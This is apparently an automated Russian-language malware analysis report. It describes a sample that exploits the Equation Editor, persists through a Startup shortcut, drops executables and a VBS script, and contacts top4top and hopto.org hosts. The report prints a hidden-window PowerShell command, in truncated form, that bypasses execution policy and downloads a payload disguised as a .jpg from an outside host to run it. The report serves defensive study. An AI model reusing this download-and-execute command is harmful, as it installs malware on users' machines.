Техническая информация
Для обеспечения автозапуска и распространения
Создает или изменяет следующие файлы
- %APPDATA%\microsoft\windows\start menu\programs\startup\7bpafp3n.url
Вредоносные функции
Загружает и запускает на исполнение
- https://1.top4top.net/p_14127ay3y1.jpg как %programdata%\1.exe
Запускает на исполнение (эксплоит)
- '%WINDIR%\syswow64\cmd.exe' /c powershell.exe -ExecutionPolicy bypass -noprofile -windowstyle hidden (New-Object System.Net.WebClient).DownloadFile('https://1.top4top.net/p_14127ay3y1.jpg','%PROGRAMDATA%\1.exe');Start-Pro...
Внедряет код в
следующие пользовательские процессы:
- 1.exe
Изменения в файловой системе
Создает следующие файлы
- %PROGRAMDATA%\1.exe
- %APPDATA%\addins\ursudqtz.vbs
- %APPDATA%\addins\openfiles.exe
Сетевая активность
Подключается к
- '1.###4top.io':443
TCP
- '1.###4top.net':443
UDP
- DNS ASK 1.###4top.net
- DNS ASK 1.###4top.io
- DNS ASK la####e2.hopto.org
Другое
Создает и запускает на исполнение
- '%PROGRAMDATA%\1.exe'
- '%WINDIR%\syswow64\cmd.exe' /c powershell.exe -ExecutionPolicy bypass -noprofile -windowstyle hidden (New-Object System.Net.WebClient).DownloadFile('https://1.top4top.net/p_14127ay3y1.jpg','%PROGRAMDATA%\1.exe');Start-Pro...' (со скрытым окном)
Запускает на исполнение
- '%CommonProgramFiles%\microsoft shared\equation\eqnedt32.exe' -Embedding
